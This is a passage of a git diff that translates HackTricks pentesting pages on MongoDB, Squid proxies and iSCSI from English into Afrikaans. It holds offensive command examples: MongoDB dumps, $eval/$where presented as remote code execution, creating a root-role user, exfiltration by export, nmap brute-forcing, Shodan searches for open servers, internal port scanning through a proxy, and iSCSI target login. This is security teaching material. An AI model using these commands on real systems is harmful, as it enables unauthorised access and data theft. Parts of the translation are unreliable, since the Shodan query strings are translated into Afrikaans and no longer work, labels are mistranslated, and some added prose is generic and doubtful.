+db..find() +``` + +**Exploitation:** + +```bash +# Dump all databases +# Stort alle databasisse +mongodump --out + +# Restore a database +# Herstel 'n databasis +mongorestore + +# Execute OS commands +# Voer OS-opdragte uit +db.runCommand({$eval: ""}) + +# Remote Code Execution (RCE) +# Verrekenaarkode-uitvoering (RCE) +db.runCommand({$where: ""}) +``` + +**Privilege Escalation:** + +```bash +# Create a new user with root role +# Skep 'n nuwe gebruiker met 'n root-rol +use admin +db.createUser({user: "", pwd: "", roles: ["root"]}) + +# Authenticate as a user +# Verifieer as 'n gebruiker +use admin +db.auth("", "") +``` + +**Exfiltration:** + +```bash +# Export a collection to a JSON file +# Voer 'n versameling uit na 'n JSON-lêer +mongoexport --db --collection --out .json + +# Import a JSON file into a collection +# Voer 'n JSON-lêer in 'n versameling in +mongoimport --db --collection --file .json +``` + +**Other:** + +```bash +# Show server status +# Wys bedienerstatus +db.serverStatus() + +# Show current user +# Wys huidige gebruiker +db.runCommand({connectionStatus: 1}) +``` ```bash show dbs use @@ -67,96 +196,153 @@ db..find() #Dump the collection db..count() #Number of records of the collection db.current.find({"username":"admin"}) #Find in current db the username admin ``` +### Outomatiese -### Automatic +```bash +nmap -p 27017,27018 --script mongodb-info +``` +Hierdie opdrag gebruik die `nmap`-hulpmiddel om die poorte 27017 en 27018 op die teiken te skandeer en die `mongodb-info` skripsie uit te voer. Hierdie skripsie sal probeer om inligting oor die MongoDB-diens te verkry, soos die weergawe, die databasisse wat beskikbaar is en die dokumente binne-in die databasisse. + +```bash +mongo --host --port 27017 +``` + +Hierdie opdrag maak 'n verbinding met die MongoDB-diens op die teiken deur die `mongo`-kliënt te gebruik. Dit vereis die spesifisering van die teiken se IP-adres (``) en die poort (`27017`). Hierdie opdrag sal jou in staat stel om direk met die MongoDB-diens te kommunikeer en verskillende opdragte uit te voer. + +```bash +show dbs +``` + +Hierdie opdrag sal 'n lys van alle databasisse wat beskikbaar is op die MongoDB-diens toon. + +```bash +use +``` + +Hierdie opdrag sal oorskakel na die gespesifiseerde databasis (``) sodat jy opdragte binne-in daardie databasis kan uitvoer. + +```bash +show collections +``` + +Hierdie opdrag sal 'n lys van alle versamelings binne-in die huidige databasis toon. + +```bash +db..find() +``` + +Hierdie opdrag sal alle dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis toon. + +```bash +db..find() +``` + +Hierdie opdrag sal alle dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis toon wat voldoen aan die gespesifiseerde vraag (``). Die vraag kan verskillende kriteria insluit, soos veldwaardes, vergelykingsoperatore en logiese operatore. + +```bash +db..insert() +``` + +Hierdie opdrag sal 'n nuwe dokument invoeg in die gespesifiseerde versameling (``) in die huidige databasis. Die dokument moet in JSON-formaat wees en die veldwaardes moet ooreenstem met die versameling se skema. + +```bash +db..update(, ) +``` + +Hierdie opdrag sal een of meer dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis opdateer wat voldoen aan die gespesifiseerde vraag (``). Die opdatering moet in JSON-formaat wees en kan verskillende opdateringsoperasies insluit, soos `$set`, `$unset`, `$inc`, `$push`, ensovoorts. + +```bash +db..remove() +``` + +Hierdie opdrag sal een of meer dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis verwyder wat voldoen aan die gespesifiseerde vraag (``). + +```bash +exit +``` + +Hierdie opdrag sal die huidige `mongo`-sessie afsluit en jou terugbring na die opdraglyn. ```bash nmap -sV --script "mongo* and default" -p 27017 #By default all the nmap mongo enumerate scripts are used ``` - ### Shodan -* All mongodb: `"mongodb server information"` -* Search for full open mongodb servers: `"mongodb server information" -"partially enabled"` -* Only partially enable auth: `"mongodb server information" "partially enabled"` +* Alle mongodb: `"mongodb bediener inligting"` +* Soek na volledig oop mongodb bedieners: `"mongodb bediener inligting" -"gedeeltelik geaktiveer"` +* Slegs gedeeltelik geaktiveerde outentifikasie: `"mongodb bediener inligting" "gedeeltelik geaktiveer"` -## Login - -By default mongo does not require password.\ -**Admin** is a common mongo database. +## Aanteken +Standaard vereis mongo nie 'n wagwoord nie.\ +**Admin** is 'n algemene mongo databasis. ```bash mongo mongo : mongo :/ mongo -u -p '' ``` - -The nmap script: _**mongodb-brute**_ will check if creds are needed. - +Die nmap-skrip: _**mongodb-brute**_ sal nagaan of geloofwaardigheidsbewyse benodig word. ```bash nmap -n -sV --script mongodb-brute -p 27017 ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mongo) -Look inside _/opt/bitnami/mongodb/mongodb.conf_ to know if credentials are needed: - +Kyk binne in _/opt/bitnami/mongodb/mongodb.conf_ om uit te vind of geloofsbriewe benodig word: ```bash grep "noauth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#" #Not needed grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not needed ``` +## Mongo Objectid Voorspelling -## Mongo Objectid Predict +Voorbeeld [van hier](https://techkranti.com/idor-through-mongodb-object-ids-prediction/). -Example [from here](https://techkranti.com/idor-through-mongodb-object-ids-prediction/). - -Mongo Object IDs are **12-byte hexadecimal** strings: +Mongo Object IDs is **12-byte heksadesimale** strings: ![http://techidiocy.com/_id-objectid-in-mongodb/](../.gitbook/assets/id-and-objectids-in-mongodb.png) -For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019 +Byvoorbeeld, hier is hoe ons 'n werklike Object ID kan ontleed wat deur 'n toepassing teruggegee word: 5f2459ac9fa6dc2500314019 -1. 5f2459ac: 1596217772 in decimal = Friday, 31 July 2020 17:49:32 -2. 9fa6dc: Machine Identifier -3. 2500: Process ID -4. 314019: An incremental counter +1. 5f2459ac: 1596217772 in desimaal = Vrydag, 31 Julie 2020 17:49:32 +2. 9fa6dc: Masjien-identifiseerder +3. 2500: Proses-ID +4. 314019: 'n Inkrementele teller -Of the above elements, machine identifier will remain the same for as long as the database is running the same physical/virtual machine. Process ID will only change if the MongoDB process is restarted. Timestamp will be updated every second. The only challenge in guessing Object IDs by simply incrementing the counter and timestamp values, is the fact that Mongo DB generates Object IDs and assigns Object IDs at a system level. +Van die bogenoemde elemente sal die masjien-identifiseerder dieselfde bly solank as wat die databasis dieselfde fisiese/virtuele masjien gebruik. Die proses-ID sal slegs verander as die MongoDB-proses herlaai word. Die tydstempel sal elke sekonde opdateer word. Die enigste uitdaging in die raai van Object IDs deur eenvoudig die teller- en tydstempelwaardes te verhoog, is die feit dat Mongo DB Object IDs genereer en toewys op 'n stelselvlak. -The tool [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict), given a starting Object ID (you can create an account and get a starting ID), it sends back about 1000 probable Object IDs that could have possibly been assigned to the next objects, so you just need to bruteforce them. +Die instrument [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict), gee 'n begin Object ID (jy kan 'n rekening skep en 'n begin-ID kry), dit stuur terug omtrent 1000 waarskynlike Object IDs wat moontlik toegewys kon gewees het aan die volgende voorwerpe, sodat jy hulle net hoef te kragtewerk. -## Post +## Plaas -If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**. +As jy root is, kan jy die **mongodb.conf**-lêer **verander** sodat geen geloofsbriewe nodig is (_noauth = true_) en **sonder geloofsbriewe aanmeld**. ***
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hackering ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige hackeringwêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagings wat begin en noodsaaklike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringtruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/3128-pentesting-squid.md b/network-services-pentesting/3128-pentesting-squid.md index 898ada341..649202ae2 100644 --- a/network-services-pentesting/3128-pentesting-squid.md +++ b/network-services-pentesting/3128-pentesting-squid.md @@ -1,71 +1,61 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -From [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)): +Vanaf [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)): -> **Squid** is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including Internet Gopher, SSL, TLS and HTTPS. Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support. - -**Default port:** 3128 +> **Squid** is 'n kassering- en deurstuur-HTTP-webproksi. Dit het 'n wye verskeidenheid toepassings, insluitend die versnelling van 'n webbediener deur herhaalde versoekings te kassering, kassering van web-, DNS- en ander rekenaarnetwerksoektogte vir 'n groep mense wat netwerkbronne deel, en bydra tot sekuriteit deur verkeer te filtreer. Alhoewel dit hoofsaaklik gebruik word vir HTTP en FTP, sluit Squid beperkte ondersteuning in vir verskeie ander protokolle, insluitend Internet Gopher, SSL, TLS en HTTPS. Squid ondersteun nie die SOCKS-protokol nie, in teenstelling met Privoxy, waarmee Squid gebruik kan word om SOCKS-ondersteuning te bied. +**Verstekpoort:** 3128 ``` PORT STATE SERVICE VERSION 3128/tcp open http-proxy Squid http proxy 4.11 ``` +# Opstel -# Enumeration - -## Web Proxy - -You can try to set this discovered service as proxy in your browser. However, if it's configured with HTTP authentication you will be prompted for usernames and password. +## Webproksi +Jy kan probeer om hierdie ontdekte diens as 'n proksi in jou webblaaier in te stel. Indien dit egter gekonfigureer is met HTTP-verifikasie, sal jy gevra word vir gebruikersname en wagwoord. ```bash # Try to proxify curl curl --proxy http://10.10.11.131:3128 http://10.10.11.131 ``` +## Nmap geproksimeer -## Nmap proxified +Jy kan ook probeer om die proxy te misbruik om **interne poorte te skandeer deur nmap te geproksimeer**.\ +Stel proxychains in om die squid proxy te gebruik deur die volgende lyn aan die einde van die proxichains.conf-lêer toe te voeg: `http 10.10.10.10 3128` -You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\ -Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file: `http 10.10.10.10 3128` +Voer dan nmap uit met proxychains om **die gasheer vanaf die plaaslike masjien te skandeer**: `proxychains nmap -sT -n -p- localhost` -Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost` - -## SPOSE Scanner - -Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) can be used. +## SPOSE-skandeerder +Alternatiewelik kan die Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) gebruik word. ```bash python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/3260-pentesting-iscsi.md b/network-services-pentesting/3260-pentesting-iscsi.md index b060b08fb..2f71b1b0b 100644 --- a/network-services-pentesting/3260-pentesting-iscsi.md +++ b/network-services-pentesting/3260-pentesting-iscsi.md @@ -2,107 +2,124 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI): +Vanaf [Wikipedia](https://en.wikipedia.org/wiki/ISCSI): -> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval. +> In rekenaars, is **iSCSI** 'n afkorting vir **Internet Small Computer Systems Interface**, 'n Internet Protocol (IP)-gebaseerde berging-netwerkstandaard vir die koppeling van data-bergingsfasiliteite. Dit bied blokvlaktoegang tot bergingsapparate deur SCSI-opdragte oor 'n TCP/IP-netwerk te dra. iSCSI word gebruik om data-oordragte oor intranette te fasiliteer en berging oor lang afstande te bestuur. Dit kan gebruik word om data oor plaaslike area-netwerke (LAN's), wye area-netwerke (WAN's) of die internet te stuur en kan lokasie-onafhanklike data-berging en -herwinning moontlik maak. > -> The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure. - -**Default port:** 3260 +> Die protokol stel kliënte (genoem inisieerders) in staat om SCSI-opdragte (CDB's) na bergingsapparate (teikens) op afgeleë bedieners te stuur. Dit is 'n berging-area-netwerk (SAN)-protokol wat organisasies in staat stel om berging in bergingsreekse te konsolideer terwyl dit kliënte (soos databasis- en webbedieners) die illusie van lokaal aangehegte SCSI-skystukke bied. Dit kom hoofsaaklik in mededinging met Fibre Channel, maar anders as tradisionele Fibre Channel wat gewoonlik toegewyde bekabeling vereis, kan iSCSI oor lang afstande uitgevoer word deur gebruik te maak van bestaande netwerkinfrastruktuur. +**Verstekpoort:** 3260 ``` PORT STATE SERVICE VERSION 3260/tcp open iscsi? ``` +## Opstel -## Enumeration +Enumeration is 'n belangrike fase in die pentesting-proses wat dit moontlik maak om inligting oor 'n doelwit se iSCSI-implementasie te verkry. Hierdie inligting kan gebruik word om swakpunte te identifiseer en moontlike aanvalsveilighede te bepaal. +### iSCSI Dienste Identifiseer + +Die eerste stap in die enumerasieproses is om die teenwoordigheid van iSCSI-dienste op die doelwit te bevestig. Dit kan gedoen word deur die volgende tegnieke te gebruik: + +- **Portskandering**: Skandeer die doelwit se poorte om te bepaal of daar enige aktiewe poorte is wat verband hou met iSCSI-dienste. Die standaardpoort vir iSCSI is 3260. + +- **Netwerkverkeerontleding**: Monitor die netwerkverkeer om te soek na enige iSCSI-verkeer wat tussen die doelwit en ander toestelle plaasvind. + +- **Banneropname**: Ondersoek die banners wat deur die doelwit se dienste teruggestuur word om te soek na enige verwysings na iSCSI. + +### iSCSI Dienste Skandering + +Nadat die teenwoordigheid van iSCSI-dienste bevestig is, kan die volgende stap wees om die dienste te skandeer om verdere inligting te verkry. Hier is 'n paar tegnieke wat gebruik kan word: + +- **Portskandering**: Skandeer die aktiewe iSCSI-poorte om te bepaal of daar enige ander poorte is wat verband hou met die diens. + +- **iSCSI-ontdekkingskandering**: Gebruik die iSCSI-ontdekkingsprotokol om te soek na iSCSI-doelwitte wat deur die doelwit bedien word. + +- **iSCSI-identifikasie**: Identifiseer die iSCSI-doelwitte wat deur die doelwit bedien word en verkry inligting soos die doelwit se naam, serienommer, IP-adres en protokol. + +### iSCSI Dienste Inligting Versameling + +Die finale stap in die enumerasieproses is om inligting oor die iSCSI-dienste te versamel. Hier is 'n paar nuttige inligting wat verkry kan word: + +- **Doelwitinligting**: Verkry inligting soos die doelwit se IP-adres, subnetmasker, DNS-inligting en ander relevante netwerkinligting. + +- **Doelwitvermoëns**: Identifiseer die vermoëns van die doelwit se iSCSI-implementasie, soos die ondersteunde protokolle, versleuteling, verbindingsmetodes en toegangsbeheer. + +- **Gebruikersinligting**: Identifiseer enige gebruikers wat toegang het tot die iSCSI-dienste en verkry inligting soos gebruikersname, wagwoorde en toegangsregte. + +Deur hierdie enumerasietegnieke te gebruik, kan 'n pentester waardevolle inligting verkry oor 'n doelwit se iSCSI-implementasie, wat kan help om moontlike aanvalsveilighede te identifiseer en 'n suksesvolle aanval te beplan. ``` nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx ``` - -This script will indicate if authentication is required. +Hierdie skrip sal aandui of verifikasie vereis word. ### [Brute force](../generic-methodologies-and-resources/brute-force.md#iscsi) -### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux) +### [Monteer ISCSI op Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux) -**Note:** You may find that when your targets are discovered, they are listed under a different IP address. This tends to happen if the iSCSI service is exposed via NAT or a virtual IP. In cases like these, `iscsiadmin` will fail to connect. This requires two tweaks: one to the directory name of the node automatically created by your discovery activities, and one to the `default` file contained within this directory. - -For example, you are trying to connect to an iSCSI target on 123.123.123.123 at port 3260. The server exposing the iSCSI target is actually at 192.168.1.2 but exposed via NAT. isciadm will register the _internal_ address rather than the _public_ address: +**Nota:** Jy mag vind dat wanneer jou teikens ontdek word, hulle gelys word onder 'n ander IP-adres. Dit gebeur dikwels as die iSCSI-diens blootgestel word deur middel van NAT of 'n virtuele IP. In sulke gevalle sal `iscsiadmin` nie kan verbind nie. Dit vereis twee aanpassings: een aan die gidsnaam van die node wat outomaties deur jou ontdekkingsaktiwiteite geskep is, en een aan die `default`-lêer wat in hierdie gids bevat word. +Byvoorbeeld, jy probeer verbind met 'n iSCSI-teiken op 123.123.123.123 by poort 3260. Die bediener wat die iSCSI-teiken blootstel, is eintlik by 192.168.1.2 maar blootgestel deur middel van NAT. isciadm sal die _interne_ adres registreer eerder as die _openbare_ adres: ``` iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260 192.168.1.2:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe [...] ``` - -This command will create a directory in your filesystem like this: - +Hierdie bevel sal 'n gids in jou lêersisteem skep soos volg: ``` /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/ ``` +Binne die gids is daar 'n versteklêer met al die instellings wat nodig is om met die teiken te verbind. -Within the directory, there is a default file with all the settings necessary to connect to the target. +1. Hernoem `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` na `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/` +2. Binne `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, verander die `node.conn[0].address` instelling om na 123.123.123.123 te wys in plaas van 192.168.1.2. Dit kan gedoen word met 'n opdrag soos `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default` -1. Rename `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` to `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/` -2. Within `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, change the `node.conn[0].address` setting to point to 123.123.123.123 instead of 192.168.1.2. This could be done with a command such as `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default` +Jy kan nou die teiken monteer volgens die instruksies in die skakel. -You may now mount the target as per the instructions in the link. - -### [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN) - -## **Manual enumeration** +### [Monteer ISCSI op Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN) +## **Handmatige opname** ```bash sudo apt-get install open-iscsi ``` +Voorbeeld van [iscsiadm dokumentasie](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm): -Example from [iscsiadm docs](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm): - -First of all you need to **discover the targets** name behind the IP: - +Eerstens moet jy die teikens se name agter die IP **ontdek**: ```bash iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260 123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe [2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382 [fe80::211:3232:fab9:1223]:3260,1 iqn.2000-01.com.synology:Oassdx.Target-1.d0280fd382 ``` +_Merk op dat dit die I**P en poort van die interfaces** sal wys waar jy daardie **teikens** kan **bereik**. Dit kan selfs **interne IP's of verskillende IP's** as die een wat jy gebruik het, wys._ -_Note that it will show the I**P and port of the interfaces** where you can **reach** those **targets**. It can even **show internal IPs or different IPs** from the one you used._ - -Then you **catch the 2nd part of the printed string of each line** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ from the first line) and **try to login**: - +Vang dan die 2de deel van die gedrukte string van elke lyn (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ van die eerste lyn) en **probeer om in te teken**: ```bash iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] (multiple) Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful. ``` - -Then, you can **logout** using `–logout` - +Dan kan jy **uitlog** deur `–logout` te gebruik ```bash iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout Logging out of session [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] Logout of [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful. ``` - -We can find **more information** about it by just using **without** any `--login`/`--logout` parameter - +Ons kan **meer inligting** daaroor vind deur net **sonder** enige `--login`/`--logout` parameter te gebruik. ```bash iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 # BEGIN RECORD 2.0-873 